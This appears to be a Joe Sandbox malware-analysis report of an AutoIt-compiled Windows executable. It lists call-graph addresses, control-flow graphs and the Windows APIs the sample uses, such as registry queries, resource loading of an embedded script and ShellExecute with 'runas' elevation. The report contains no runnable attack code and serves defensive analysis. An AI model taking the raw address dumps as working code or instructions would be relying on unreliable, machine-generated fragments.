7ff656cb7a83 Concurrency::wait 95460->95464 95472 7ff656cfd147 wcscat Concurrency::wait 95460->95472 95462 7ff656cd4c68 4 API calls 95461->95462 95463 7ff656cfd0b2 95462->95463 95465 7ff656cfd0bf RegQueryValueExW 95463->95465 95464->95405 95466 7ff656cfd0f3 95465->95466 95469 7ff656cfd112 95465->95469 95467 7ff656cb7cf4 4 API calls 95466->95467 95467->95469 95468 7ff656cb9d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95468->95472 95469->95460 95470 7ff656cbec00 4 API calls 95470->95472 95471 7ff656cb4680 4 API calls 95471->95472 95472->95464 95472->95468 95472->95470 95472->95471 95473->95407 95495 7ff656cf8f90 95474->95495 95477 7ff656cbec00 4 API calls 95478 7ff656cb56b4 95477->95478 95497 7ff656cb56d4 95478->95497 95480 7ff656cb56c1 Concurrency::wait 95480->95448 95482 7ff656cf8f90 wcsftime 95481->95482 95483 7ff656cd3a44 GetFullPathNameW 95482->95483 95484 7ff656cd3a74 95483->95484 95485 7ff656cb7cf4 4 API calls 95484->95485 95486 7ff656cb7a1b 95485->95486 95486->95451 95488 7ff656cb469f 95487->95488 95489 7ff656cb46c8 memcpy_s 95487->95489 95490 7ff656cd4c68 4 API calls 95488->95490 95489->95454 95490->95489 95492 7ff656cba87a 95491->95492 95494 7ff656cb7a51 RegOpenKeyExW 95491->95494 95493 7ff656cd4c68 4 API calls 95492->95493 95493->95494 95494->95459 95494->95464 95496 7ff656cb568c GetModuleFileNameW 95495->95496 95496->95477 95498 7ff656cf8f90 wcsftime 95497->95498 95499 7ff656cb56e9 GetFullPathNameW 95498->95499 95500 7ff656cb5712 95499->95500 95501 7ff656cfc03a 95499->95501 95503 7ff656cb7cf4 4 API calls 95500->95503 95502 7ff656cba854 4 API calls 95501->95502 95504 7ff656cb571c 95502->95504 95503->95504 95504->95504 95505 7ff656cbdda4 4 API calls 95504->95505 95506 7ff656cb5785 95505->95506 95506->95480 95544 7ff656cb82b4 95507->95544 95510 7ff656cb82b4 4 API calls 95511 7ff656cb7f3a 95510->95511 95512 7ff656cb9640 4 API calls 95511->95512 95513 7ff656cb7f46 95512->95513 95514 7ff656cb7cf4 4 API calls 95513->95514 95515 
7ff656cb7f59 95514->95515 95551 7ff656cd2d5c 6 API calls 95515->95551 95517 7ff656cb7fa5 95518 7ff656cb9640 4 API calls 95517->95518 95519 7ff656cb7fb1 95518->95519 95520 7ff656cb9640 4 API calls 95519->95520 95521 7ff656cb7fbd 95520->95521 95522 7ff656cb9640 4 API calls 95521->95522 95523 7ff656cb7fc9 95522->95523 95524 7ff656cb9640 4 API calls 95523->95524 95525 7ff656cb800f 95524->95525 95526 7ff656cb9640 4 API calls 95525->95526 95527 7ff656cb80f7 95526->95527 95552 7ff656ccef88 95527->95552 95529 7ff656cb8103 95559 7ff656cceec8 95529->95559 95531 7ff656cb812f 95532 7ff656cb9640 4 API calls 95531->95532 95533 7ff656cb813b 95532->95533 95570 7ff656cc6d40 95533->95570 95537 7ff656cb81ac 95538 7ff656cb81be GetStdHandle 95537->95538 95539 7ff656cb8220 OleInitialize 95538->95539 95540 7ff656cfd350 95538->95540 95539->95410 95587 7ff656d2ffc8 CreateThread 95540->95587 95542 7ff656cfd367 CloseHandle 95543->95412 95545 7ff656cb9640 4 API calls 95544->95545 95546 7ff656cb82c6 95545->95546 95547 7ff656cb9640 4 API calls 95546->95547 95548 7ff656cb82cf 95547->95548 95549 7ff656cb9640 4 API calls 95548->95549 95550 7ff656cb7f2e 95549->95550 95550->95510 95551->95517 95553 7ff656cb9640 4 API calls 95552->95553 95554 7ff656ccefa3 95553->95554 95555 7ff656cb9640 4 API calls 95554->95555 95556 7ff656ccefac 95555->95556 95557 7ff656cb9640 4 API calls 95556->95557 95558 7ff656ccf02e 95557->95558 95558->95529 95560 7ff656cceede 95559->95560 95561 7ff656cb9640 4 API calls 95560->95561 95562 7ff656cceeea 95561->95562 95563 7ff656cb9640 4 API calls 95562->95563 95564 7ff656cceef6 95563->95564 95565 7ff656cb9640 4 API calls 95564->95565 95566 7ff656ccef02 95565->95566 95567 7ff656cb9640 4 API calls 95566->95567 95568 7ff656ccef0e 95567->95568 95569 7ff656ccef68 RegisterWindowMessageW 95568->95569 95569->95531 95571 7ff656cc6db9 95570->95571 95577 7ff656cc6d80 95570->95577 95588 7ff656cd5114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx 
EnterCriticalSection 95571->95588 95579 7ff656cb816b 95577->95579 95589 7ff656cd5114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95577->95589 95580 7ff656cd39a8 95579->95580 95581 7ff656d1a502 95580->95581 95586 7ff656cd39cc 95580->95586 95590 7ff656cbee20 5 API calls Concurrency::wait 95581->95590 95583 7ff656d1a50e 95591 7ff656cbee20 5 API calls Concurrency::wait 95583->95591 95585 7ff656d1a52d 95586->95537 95587->95542 95590->95583 95591->95585 95593 7ff656cb9640 4 API calls 95592->95593 95594 7ff656cb778f 95593->95594 95600 7ff656cb6f24 95594->95600 95596 7ff656cb782c 95597 7ff656cb1051 95596->95597 95603 7ff656cb7410 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95596->95603 95599 7ff656cd4ebc 34 API calls _onexit 95597->95599 95599->95417 95604 7ff656cb6f60 95600->95604 95603->95596 95605 7ff656cb6f52 95604->95605 95606 7ff656cb6f85 95604->95606 95605->95596 95606->95605 95607 7ff656cb6f93 RegOpenKeyExW 95606->95607 95607->95605 95608 7ff656cb6faf RegQueryValueExW 95607->95608 95609 7ff656cb6ff5 RegCloseKey 95608->95609 95610 7ff656cb6fdd 95608->95610 95609->95605 95610->95609 95612 7ff656cd5947 GetStartupInfoW 95611->95612 95612->95325 95671 7ff656ceb9bc EnterCriticalSection 95613->95671 95615 7ff656cd92e4 95616 7ff656ceba10 _isindst LeaveCriticalSection 95615->95616 95617 7ff656cb376e 95616->95617 95618 7ff656cd9334 95617->95618 95619 7ff656cd933d 95618->95619 95623 7ff656cb3778 95618->95623 95672 7ff656ce55d4 15 API calls _invalid_parameter_noinfo 95619->95672 95621 7ff656cd9342 95673 7ff656ceb164 31 API calls _invalid_parameter_noinfo 95621->95673 95624 7ff656cb36e8 SystemParametersInfoW SystemParametersInfoW 95623->95624 95624->95357 95626 7ff656cb37cd wcsftime 95625->95626 95627 7ff656cb9640 4 API calls 95626->95627 95628 7ff656cb37dd GetCurrentDirectoryW 95627->95628 95674 7ff656cb57a0 95628->95674 95630 7ff656cb3807 IsDebuggerPresent 95631 7ff656cfb872 
MessageBoxA 95630->95631 95632 7ff656cb3815 95630->95632 95633 7ff656cfb894 95631->95633 95632->95633 95634 7ff656cb3839 95632->95634 95784 7ff656cbe278 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95633->95784 95748 7ff656cb3f04 95634->95748 95638 7ff656cb3860 GetFullPathNameW 95639 7ff656cb7cf4 4 API calls 95638->95639 95641 7ff656cb38a6 95639->95641 95640 7ff656cb38bf 95643 7ff656cfb8dc SetCurrentDirectoryW 95640->95643 95644 7ff656cb38c7 95640->95644 95764 7ff656cb3f9c 95641->95764 95643->95644 95645 7ff656cb38d0 95644->95645 95785 7ff656d1d540 AllocateAndInitializeSid CheckTokenMembership FreeSid 95644->95785 95780 7ff656cb3b84 7 API calls 95645->95780 95648 7ff656cfb8f8 95648->95645 95651 7ff656cfb90c 95648->95651 95653 7ff656cb5680 6 API calls 95651->95653 95652 7ff656cb38da 95655 7ff656cb6258 46 API calls 95652->95655 95658 7ff656cb38ef 95652->95658 95654 7ff656cfb916 95653->95654 95656 7ff656cbec00 4 API calls 95654->95656 95655->95658 95659 7ff656cfb927 95656->95659 95657 7ff656cb3913 95663 7ff656cb391f SetCurrentDirectoryW 95657->95663 95658->95657 95660 7ff656cb5d88 Shell_NotifyIconW 95658->95660 95661 7ff656cfb930 95659->95661 95662 7ff656cfb94d 95659->95662 95660->95657 95664 7ff656cb71f8 4 API calls 95661->95664 95667 7ff656cb71f8 4 API calls 95662->95667 95666 7ff656cb3934 Concurrency::wait 95663->95666 95665 7ff656cfb93c 95664->95665 95786 7ff656cb7c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 95665->95786 95666->95359 95669 7ff656cfb963 GetForegroundWindow ShellExecuteW 95667->95669 95670 7ff656cfb99f Concurrency::wait 95669->95670 95670->95657 95672->95621 95673->95623 95675 7ff656cb9640 4 API calls 95674->95675 95676 7ff656cb57d7 95675->95676 95787 7ff656cb9bbc 95676->95787 95678 7ff656cb57fe 95679 7ff656cb5680 6 API calls 95678->95679 95680 7ff656cb5812 95679->95680 95681 7ff656cbec00 4 API calls 95680->95681 95682 7ff656cb5823 95681->95682 95801 7ff656cb6460 
95682->95801 95685 7ff656cb584e Concurrency::wait 95690 7ff656cbe0a8 4 API calls 95685->95690 95686 7ff656cfc05e 95874 7ff656d32948 95686->95874 95688 7ff656cfc074 95689 7ff656cfc081 95688->95689 95691 7ff656cb652c 63 API calls 95688->95691 95892 7ff656cb652c 95689->95892 95692 7ff656cb586a 95690->95692 95691->95689 95694 7ff656cbec00 4 API calls 95692->95694 95695 7ff656cb5888 95694->95695 95699 7ff656cfc099 95695->95699 95827 7ff656cbeff8 95695->95827 95697 7ff656cb58ad Concurrency::wait 95698 7ff656cbec00 4 API calls 95697->95698 95700 7ff656cb58d7 95698->95700 95702 7ff656cb5ab4 4 API calls 95699->95702 95700->95699 95701 7ff656cbeff8 46 API calls 95700->95701 95704 7ff656cb58fc Concurrency::wait 95701->95704 95703 7ff656cfc0e1 95702->95703 95705 7ff656cb5ab4 4 API calls 95703->95705 95706 7ff656cb9640 4 API calls 95704->95706 95707 7ff656cfc103 95705->95707 95708 7ff656cb591f 95706->95708 95710 7ff656cb5680 6 API calls 95707->95710 95840 7ff656cb5ab4 95708->95840 95712 7ff656cfc12b 95710->95712 95714 7ff656cb5ab4 4 API calls 95712->95714 95716 7ff656cfc139 95714->95716 95715 7ff656cb5941 95715->95699 95717 7ff656cb5949 95715->95717 95718 7ff656cbe0a8 4 API calls 95716->95718 95719 7ff656cd8e28 wcsftime 37 API calls 95717->95719 95720 7ff656cfc14a 95718->95720 95721 7ff656cb5958 95719->95721 95722 7ff656cb5ab4 4 API calls 95720->95722 95721->95703 95723 7ff656cb5960 95721->95723 95726 7ff656cfc15b 95722->95726 95724 7ff656cd8e28 wcsftime 37 API calls 95723->95724 95725 7ff656cb596f 95724->95725 95725->95707 95727 7ff656cb5977 95725->95727 95728 7ff656cbe0a8 4 API calls 95726->95728 95729 7ff656cd8e28 wcsftime 37 API calls 95727->95729 95730 7ff656cfc172 95728->95730 95731 7ff656cb5986 95729->95731 95732 7ff656cb5ab4 4 API calls 95730->95732 95733 7ff656cb59c6 95731->95733 95734 7ff656cb5ab4 4 API calls 95731->95734 95736 7ff656cfc183 95732->95736 95733->95726 95735 7ff656cb59d3 95733->95735 95737 7ff656cb59a8 95734->95737 95863 7ff656cbdf90 95735->95863 95738 
7ff656cbe0a8 4 API calls 95737->95738 95739 7ff656cb59b5 95738->95739 95741 7ff656cb5ab4 4 API calls 95739->95741 95741->95733 95744 7ff656cbd670 5 API calls 95745 7ff656cb5a12 95744->95745 95745->95744 95746 7ff656cb5ab4 4 API calls 95745->95746 95747 7ff656cb5a60 Concurrency::wait 95745->95747 95746->95745 95747->95630 95749 7ff656cb3f29 wcsftime 95748->95749 95750 7ff656cfba2c fread_s 95749->95750 95751 7ff656cb3f4b 95749->95751 95753 7ff656cfba4d GetOpenFileNameW 95750->95753 95752 7ff656cb56d4 5 API calls 95751->95752 95754 7ff656cb3f56 95752->95754 95755 7ff656cfbab0 95753->95755 95756 7ff656cb3858 95753->95756 96236 7ff656cb3eb4 95754->96236 95759 7ff656cb7cf4 4 API calls 95755->95759 95756->95638 95756->95640 95761 7ff656cfbabc 95759->95761 95762 7ff656cb3f6c 96254 7ff656cb6394 95762->96254 95765 7ff656cb3fb6 wcsftime 95764->95765 96297 7ff656cb9734 95765->96297 95767 7ff656cb3fc4 95768 7ff656cb4050 95767->95768 96307 7ff656cb4d28 77 API calls 95767->96307 95768->95640 95770 7ff656cb3fd3 95770->95768 96308 7ff656cb4b0c 79 API calls Concurrency::wait 95770->96308 95772 7ff656cb3fe0 95772->95768 95773 7ff656cb3fe8 GetFullPathNameW 95772->95773 95774 7ff656cb7cf4 4 API calls 95773->95774 95775 7ff656cb4014 95774->95775 95776 7ff656cb7cf4 4 API calls 95775->95776 95777 7ff656cb4028 95776->95777 95778 7ff656cfbac2 wcscat 95777->95778 95779 7ff656cb7cf4 4 API calls 95777->95779 95779->95768 96312 7ff656cb3d90 7 API calls 95780->96312 95782 7ff656cb38d5 95783 7ff656cb3cbc CreateWindowExW CreateWindowExW ShowWindow ShowWindow 95782->95783 95784->95640 95785->95648 95786->95662 95788 7ff656cb9be5 wcsftime 95787->95788 95789 7ff656cb7cf4 4 API calls 95788->95789 95791 7ff656cb9c1b 95788->95791 95789->95791 95799 7ff656cb9c4a Concurrency::wait 95791->95799 95898 7ff656cb9d84 95791->95898 95792 7ff656cbec00 4 API calls 95793 7ff656cb9d4a 95792->95793 95795 7ff656cb4680 4 API calls 95793->95795 95794 7ff656cbec00 4 API calls 95794->95799 95797 7ff656cb9d57 
Concurrency::wait 95795->95797 95796 7ff656cb9d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95796->95799 95797->95678 95798 7ff656cb4680 4 API calls 95798->95799 95799->95794 95799->95796 95799->95798 95800 7ff656cb9d21 95799->95800 95800->95792 95800->95797 95901 7ff656cb6d64 95801->95901 95804 7ff656cb649d 95805 7ff656cb64c0 95804->95805 95806 7ff656cb64ba FreeLibrary 95804->95806 95905 7ff656ce48e0 95805->95905 95806->95805 95807 7ff656cb6d64 2 API calls 95807->95804 95810 7ff656cfc8f6 95812 7ff656cb652c 63 API calls 95810->95812 95811 7ff656cb64db LoadLibraryExW 95924 7ff656cb6cc4 95811->95924 95814 7ff656cfc8fe 95812->95814 95816 7ff656cb6cc4 3 API calls 95814->95816 95818 7ff656cfc907 95816->95818 95946 7ff656cb67d8 95818->95946 95819 7ff656cb6505 95819->95818 95820 7ff656cb6512 95819->95820 95822 7ff656cb652c 63 API calls 95820->95822 95824 7ff656cb5846 95822->95824 95824->95685 95824->95686 95826 7ff656cfc93f 96149 7ff656cc1a30 95827->96149 95829 7ff656cbf029 95830 7ff656d0a7a8 95829->95830 95831 7ff656cbf040 95829->95831 96165 7ff656cbee20 5 API calls Concurrency::wait 95830->96165 95834 7ff656cd4c68 4 API calls 95831->95834 95833 7ff656d0a7bc 95835 7ff656cbf066 95834->95835 95837 7ff656cbf08f 95835->95837 96164 7ff656cbf0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95835->96164 96160 7ff656cbf1bc 95837->96160 95839 7ff656cbf0c6 95839->95697 95841 7ff656cb5ae4 95840->95841 95842 7ff656cb5ac6 95840->95842 95843 7ff656cb7cf4 4 API calls 95841->95843 95844 7ff656cbe0a8 4 API calls 95842->95844 95845 7ff656cb592d 95843->95845 95844->95845 95846 7ff656cd8e28 95845->95846 95847 7ff656cd8ea4 95846->95847 95848 7ff656cd8e3f 95846->95848 96169 7ff656cd8d98 35 API calls _mbstowcs_s_l 95847->96169 95857 7ff656cd8e63 95848->95857 96167 7ff656ce55d4 15 API calls _invalid_parameter_noinfo 95848->96167 95851 7ff656cd8ed6 95853 7ff656cd8ee2 95851->95853 95858 7ff656cd8ef9 95851->95858 95852 
7ff656cd8e49 96168 7ff656ceb164 31 API calls _invalid_parameter_noinfo 95852->96168 96170 7ff656ce55d4 15 API calls _invalid_parameter_noinfo 95853->96170 95856 7ff656cd8e54 95856->95715 95857->95715 95860 7ff656cd8ef2 95858->95860 95862 7ff656ce2c80 37 API calls wcsftime 95858->95862 95859 7ff656cd8ee7 96171 7ff656ceb164 31 API calls _invalid_parameter_noinfo 95859->96171 95860->95715 95862->95858 95865 7ff656cbdfac 95863->95865 95864 7ff656cd4c68 4 API calls 95866 7ff656cb59f5 95864->95866 95865->95864 95865->95866 95867 7ff656cbd670 95866->95867 95868 7ff656cbd698 95867->95868 95872 7ff656cbd6a2 95868->95872 96172 7ff656cb880c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95868->96172 95871 7ff656d09d43 95873 7ff656cbd7de 95872->95873 96173 7ff656cbee20 5 API calls Concurrency::wait 95872->96173 95873->95745 95875 7ff656d329c8 95874->95875 96174 7ff656d32b70 95875->96174 95878 7ff656cb67d8 45 API calls 95879 7ff656d32a03 95878->95879 95880 7ff656cb67d8 45 API calls 95879->95880 95881 7ff656d32a23 95880->95881 95882 7ff656cb67d8 45 API calls 95881->95882 95883 7ff656d32a49 95882->95883 95884 7ff656cb67d8 45 API calls 95883->95884 95885 7ff656d32a6d 95884->95885 95886 7ff656cb67d8 45 API calls 95885->95886 95887 7ff656d32ac5 95886->95887 95888 7ff656d3240c 32 API calls 95887->95888 95889 7ff656d32ada 95888->95889 95891 7ff656d329de 95889->95891 96179 7ff656d31d48 95889->96179 95891->95688 95893 7ff656cb6542 95892->95893 95894 7ff656cb653d 95892->95894 95896 7ff656cb656f FreeLibrary 95893->95896 95897 7ff656cb6558 95893->95897 95895 7ff656ce4970 62 API calls 95894->95895 95895->95893 95896->95897 95897->95699 95899 7ff656cba7c0 4 API calls 95898->95899 95900 7ff656cb9d99 95899->95900 95900->95791 95902 7ff656cb6d74 LoadLibraryA 95901->95902 95903 7ff656cb6490 95901->95903 95902->95903 95904 7ff656cb6d89 GetProcAddress 95902->95904 95903->95804 95903->95807 95904->95903 95906 7ff656ce47fc 95905->95906 95907 7ff656ce482a 95906->95907 
95910 7ff656ce485c 95906->95910 95966 7ff656ce55d4 15 API calls _invalid_parameter_noinfo 95907->95966 95909 7ff656ce482f 95967 7ff656ceb164 31 API calls _invalid_parameter_noinfo 95909->95967 95912 7ff656ce4862 95910->95912 95913 7ff656ce486f 95910->95913 95968 7ff656ce55d4 15 API calls _invalid_parameter_noinfo 95912->95968 95954 7ff656cefeb4 95913->95954 95916 7ff656cb64cf 95916->95810 95916->95811 95918 7ff656ce4883 95969 7ff656ce55d4 15 API calls _invalid_parameter_noinfo 95918->95969 95919 7ff656ce4890 95961 7ff656cf0304 95919->95961 95922 7ff656ce48a3 95970 7ff656cddf60 LeaveCriticalSection 95922->95970 96108 7ff656cb6d1c 95924->96108 95927 7ff656cb6cf1 95929 7ff656cb6d0f FreeLibrary 95927->95929 95930 7ff656cb64f7 95927->95930 95928 7ff656cb6d1c 2 API calls 95928->95927 95929->95930 95931 7ff656cb6580 95930->95931 95932 7ff656cd4c68 4 API calls 95931->95932 95933 7ff656cb65b5 memcpy_s 95932->95933 95934 7ff656cfc9f5 95933->95934 95935 7ff656cb6740 CreateStreamOnHGlobal 95933->95935 95945 7ff656cb6602 95933->95945 96112 7ff656d32e00 45 API calls 95934->96112 95937 7ff656cb6759 FindResourceExW 95935->95937 95935->95945 95937->95945 95938 7ff656cfc97e LoadResource 95940 7ff656cfc997 SizeofResource 95938->95940 95938->95945 95939 7ff656cb67d8 45 API calls 95939->95945 95942 7ff656cfc9ae LockResource 95940->95942 95940->95945 95941 7ff656cfc9fd 95943 7ff656cb67d8 45 API calls 95941->95943 95942->95945 95944 7ff656cb66e8 95943->95944 95944->95819 95945->95938 95945->95939 95945->95941 95945->95944 95947 7ff656cfca6c 95946->95947 95948 7ff656cb67f7 95946->95948 96113 7ff656ce4c5c 95948->96113 95951 7ff656d3240c 96132 7ff656d32200 95951->96132 95953 7ff656d32430 95953->95826 95971 7ff656ceb9bc EnterCriticalSection 95954->95971 95956 7ff656cefecb 95957 7ff656ceff54 18 API calls 95956->95957 95958 7ff656cefed6 95957->95958 95959 7ff656ceba10 _isindst LeaveCriticalSection 95958->95959 95960 7ff656ce4879 95959->95960 95960->95918 95960->95919 95972 7ff656cf0040 

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF656CB3785), ref: 00007FF656CB37F2
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF656CB3785), ref: 00007FF656CB3807
• GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF656CB3785), ref: 00007FF656CB388D
  • Part of subcall function 00007FF656CB3F9C: GetFullPathNameW.KERNEL32(D000000000000000,00007FF656CB38BF,?,?,?,?,?,00007FF656CB3785), ref: 00007FF656CB3FFD
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF656CB3785), ref: 00007FF656CB3924
• MessageBoxA.USER32 ref: 00007FF656CFB888
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF656CB3785), ref: 00007FF656CFB8E1
• GetForegroundWindow.USER32(?,?,?,?,?,00007FF656CB3785), ref: 00007FF656CFB968
• ShellExecuteW.SHELL32 ref: 00007FF656CFB98F
  • Part of subcall function 00007FF656CB3B84: GetSysColorBrush.USER32 ref: 00007FF656CB3B9E
  • Part of subcall function 00007FF656CB3B84: LoadCursorW.USER32 ref: 00007FF656CB3BAE
  • Part of subcall function 00007FF656CB3B84: LoadIconW.USER32 ref: 00007FF656CB3BC3
  • Part of subcall function 00007FF656CB3B84: LoadIconW.USER32 ref: 00007FF656CB3BDC
  • Part of subcall function 00007FF656CB3B84: LoadIconW.USER32 ref: 00007FF656CB3BF5
  • Part of subcall function 00007FF656CB3B84: LoadImageW.USER32 ref: 00007FF656CB3C21
  • Part of subcall function 00007FF656CB3B84: RegisterClassExW.USER32 ref: 00007FF656CB3C85
  • Part of subcall function 00007FF656CB3CBC: CreateWindowExW.USER32 ref: 00007FF656CB3D0C
  • Part of subcall function 00007FF656CB3CBC: CreateWindowExW.USER32 ref: 00007FF656CB3D5F
  • Part of subcall function 00007FF656CB3CBC: ShowWindow.USER32 ref: 00007FF656CB3D75
  • Part of subcall function 00007FF656CB6258: Shell_NotifyIconW.SHELL32 ref: 00007FF656CB6350
Memory Dump Source
• Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
• Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
Similarity
• API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
• String ID: This is a third-party compiled AutoIt script.$runas
• API String ID: 1593035822-3287110873
• Opcode ID: 76182cffaad3958b66f0f298839ba34e861d4864c33095e5d1649e464e4238a0
• Instruction ID: dc8fda2a323fa5bed7ddb32e7f0a3c314144648a0ae90f4094809ce139e1f80e
• Opcode Fuzzy Hash: 76182cffaad3958b66f0f298839ba34e861d4864c33095e5d1649e464e4238a0
• Instruction Fuzzy Hash: 92716BB1E1CA8395FA20AB20E8401F96770BF55348F8C1B36D54DE66B6DF6EE649C300

Control-flow Graph

[Control-flow graph 352: 7ff656cb6580-7ff656cb65fc]

Memory Dump Source
• Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
• Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
Similarity
• API ID: Resource$CreateFindGlobalLoadLockSizeofStream
• String ID: AU3!$EA06$SCRIPT
• API String ID: 3051347437-2925976212
• Opcode ID: f73255c4aa979fac3e714f182413f4c7844587de4428a3b007482dfb801f65cd
• Instruction ID: a0119d348b1a2c94c2e795094655dcc28716a73b6456808999cf4a3c18541354
• Opcode Fuzzy Hash: f73255c4aa979fac3e714f182413f4c7844587de4428a3b007482dfb801f65cd
• Instruction Fuzzy Hash: 5191F4B2B0965186EB20CB22D444A7D37B4BB45B84F894136DE9EE7795DF3EE484C300

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 482 7ff656cd1d80-7ff656cd1e17 call 7ff656cb9640 GetVersionExW call 7ff656cb7cf4 487 7ff656d19450 482->487 488 7ff656cd1e1d 482->488 490 7ff656d19457-7ff656d1945d 487->490 489 7ff656cd1e20-7ff656cd1e46 call 7ff656cbdda4 488->489 495 7ff656cd1fc1 489->495 496 7ff656cd1e4c 489->496 492 7ff656d19463-7ff656d19480 490->492 492->492 494 7ff656d19482-7ff656d19485 492->494 494->489 497 7ff656d1948b-7ff656d19491 494->497 495->487 498 7ff656cd1e53-7ff656cd1e59 496->498 497->490 499 7ff656d19493 497->499 500 7ff656cd1e5f-7ff656cd1e7c 498->500 502 7ff656d19498-7ff656d194a1 499->502 500->500 501 7ff656cd1e7e-7ff656cd1e81 500->501 501->502 504 7ff656cd1e87-7ff656cd1ed6 call 7ff656cbdda4 501->504 502->498 503 7ff656d194a7 502->503 503->495 507 7ff656cd1edc-7ff656cd1ede 504->507 508 7ff656d19645-7ff656d1964d 504->508 511 7ff656cd1ee4-7ff656cd1efa 507->511 512 7ff656d194ac-7ff656d194af 507->512 509 7ff656d1965a-7ff656d1965d 508->509 510 7ff656d1964f-7ff656d19658 508->510 515 7ff656d19686-7ff656d19692 509->515 516 7ff656d1965f-7ff656d19674 509->516 510->515 517 7ff656cd1f00-7ff656cd1f02 511->517 518 7ff656d19572-7ff656d19579 511->518 513 7ff656cd1f3c-7ff656cd1f80 GetCurrentProcess IsWow64Process call 7ff656cd6240 512->513 514 7ff656d194b5-7ff656d19501 512->514 532 7ff656d1969d-7ff656d196b3 call 7ff656d232f4 513->532 538 7ff656cd1f86-7ff656cd1f8b GetSystemInfo 513->538 514->513 520 7ff656d19507-7ff656d1950e 514->520 515->532 521 7ff656d19676-7ff656d1967d 516->521 522 7ff656d1967f 516->522 525 7ff656d1959e-7ff656d195b3 517->525 526 7ff656cd1f08-7ff656cd1f0b 517->526 523 7ff656d19589-7ff656d19599 518->523 524 7ff656d1957b-7ff656d19584 518->524 530 7ff656d19510-7ff656d19518 520->530 531 7ff656d19534-7ff656d1953c 520->531 521->515 522->515 523->513 524->513 527 
7ff656d195c3-7ff656d195d3 525->527 528 7ff656d195b5-7ff656d195be 525->528 533 7ff656d195ed-7ff656d195f0 526->533 534 7ff656cd1f11-7ff656cd1f2d 526->534 527->513 528->513 540 7ff656d19526-7ff656d1952f 530->540 541 7ff656d1951a-7ff656d19521 530->541 542 7ff656d1954c-7ff656d19554 531->542 543 7ff656d1953e-7ff656d19547 531->543 550 7ff656d196d7-7ff656d196dc GetSystemInfo 532->550 551 7ff656d196b5-7ff656d196d5 call 7ff656d232f4 532->551 533->513 539 7ff656d195f6-7ff656d19620 533->539 536 7ff656cd1f33 534->536 537 7ff656d195d8-7ff656d195e8 534->537 536->513 537->513 545 7ff656cd1f91-7ff656cd1fc0 538->545 546 7ff656d19630-7ff656d19640 539->546 547 7ff656d19622-7ff656d1962b 539->547 540->513 541->513 548 7ff656d19556-7ff656d1955f 542->548 549 7ff656d19564-7ff656d1956d 542->549 543->513 546->513 547->513 548->513 549->513 553 7ff656d196e2-7ff656d196ea 550->553 551->553 553->545 555 7ff656d196f0-7ff656d196f7 FreeLibrary 553->555 555->545
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
• Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Process$CurrentInfoSystemVersionWow64
                                                                                                                                                                                                                    • String ID: |O
                                                                                                                                                                                                                    • API String ID: 1568231622-607156228
                                                                                                                                                                                                                    • Opcode ID: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
